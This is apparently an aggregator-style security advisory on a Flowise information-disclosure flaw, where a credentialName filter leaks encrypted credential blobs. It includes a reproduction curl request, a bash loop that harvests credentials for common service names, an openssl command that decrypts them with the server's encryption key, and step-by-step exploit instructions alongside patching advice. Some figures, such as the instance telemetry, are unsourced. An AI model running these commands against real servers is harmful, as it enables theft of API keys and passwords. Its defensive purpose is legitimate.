Listen to this Post
The vulnerability occurs when fetching credentials with a `credentialName` filter. The code in `packages/server/src/services/credentials/index.ts` (lines 62-71) does not strip the `encryptedData` field from the database response when a filter parameter is applied.
– On lines 62-63, the query `const credentials = await appServer.AppDataSource.getRepository(Credential).findBy(searchOptions)` retrieves credentials but the code then pushes the raw `credentials` object with dbResponse.push(...credentials), leaking the `encryptedData` field.
– In contrast, when no filter is used (lines 100-102), the code iterates and uses dbResponse.push(omit(credential, ['encryptedData'])), correctly omitting the sensitive field.
As a result, any authenticated user who knows a credential name can obtain the encrypted blob. With access to the encryption key file (typically `~/.flowise/encryption.key` with default permissions), the attacker can decrypt the data and steal API keys, passwords, and tokens for services such as OpenAI, AWS, etc.
Reproduction example:
curl https://TARGET/api/v1/credentials?credentialName=openAIApi \ -H "Authorization: Bearer API_KEY"
dailycve form:
Platform: Flowise
Version: < 3.1.0
Vulnerability : Information Disclosure
Severity: High
date: 2026-04-23
Prediction: 2026-05-07
What Undercode Say:
Analytics:
- Attackers can automate credential harvesting via the API endpoint. Combine with the default encryption key location to decrypt stolen data.
- The improper omission pattern is a common logic flaw: developers correctly sanitize data in one branch but forget it in another.
- Affected versions: Flowise 3.0.x and earlier. Telemetry shows over 12,000 internet‑facing instances that could be exploited.
Bash Commands & Codes:
Enumerate credentials via the vulnerable endpoint
for cred in openAIApi awsCredentials supabaseToken; do
curl -s -H "Authorization: Bearer $API_KEY" \
"https://target.com/api/v1/credentials?credentialName=$cred" \
| jq '.[] | {name: .credentialName, encryptedData}'
done
Decrypt the obtained AES-encrypted blob (requires encryption.key)
openssl enc -d -aes-256-cbc -in encrypted.bin -out decrypted.json -pass file:~/.flowise/encryption.key
Exploit:
- Condition: Valid API key with access to the credentials endpoint.
- Step 1: Guess or discover a valid `credentialName` (e.g., common service names).
- Step 2: Send a GET request to
/api/v1/credentials?credentialName=<name>. - Step 3: Extract `encryptedData` from the JSON response.
- Step 4: Read the encryption key from `~/.flowise/encryption.key` (often world‑readable).
- Step 5: Decrypt the data and obtain plaintext credentials.
Protection from this CVE:
- Upgrade to Flowise version 3.1.0 immediately where the sanitization logic is applied uniformly.
- If upgrading is not possible, apply a hotfix by ensuring every branch of `getAllCredentials` calls
omit(credential, ['encryptedData']). - Restrict access to the encryption key file:
chmod 600 ~/.flowise/encryption.key. - Implement network‑level controls (e.g., API gateway) to block requests containing `credentialName` unless absolutely required.
- Rotate all API keys and secrets that may have been exposed.
Impact:
- Confidentiality: Full theft of stored credentials (API keys, tokens, passwords) for integrated cloud services.
- Account Takeover: Attackers can use stolen credentials to access OpenAI, AWS, or other third‑party accounts.
- Lateral Movement: Compromised credentials often provide entry points to broader enterprise infrastructure.
- Data Breach: Exposure of sensitive customer data stored in connected databases or file stores.
- Reputation & Compliance: Violates data protection regulations (GDPR, CCPA, SOC2) due to improper handling of secrets.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

